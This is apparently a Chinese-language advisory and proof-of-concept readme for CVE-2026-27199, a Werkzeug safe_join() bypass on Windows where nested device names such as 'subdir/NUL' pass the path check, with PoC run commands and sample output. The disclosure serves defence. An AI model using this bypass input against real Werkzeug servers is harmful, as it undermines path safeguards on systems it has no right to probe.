safe_join() Windows 设备名绕过状态: 已公开披露。已在 werkzeug 3.1.6 中修复。
严重性: 中等
报告者: @alimezar
安全公告: GHSA-29vq-49wr-vm6x
| 包 | 受影响 | 已修复 |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
要求: Windows、Python 3.8+、
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug 版本 : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (已正确阻止)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (绕过成功!)
[*] 尝试写入返回的路径 ...
[!] open(嵌套 NUL) 写入: 成功 — 数据被设备静默丢弃
[!] 存在漏洞: 已确认此安装存在 CVE-2026-27199。
请升级至 werkzeug >= 3.1.6 以修复该问题。
[+] safe_join(base, 'subdir/NUL') -> None (已正确阻止)
[+] 不存在漏洞: 嵌套设备名已被阻止。
本 PoC 在负责任披露且公开补丁可用后发布,仅供教育和防御目的使用。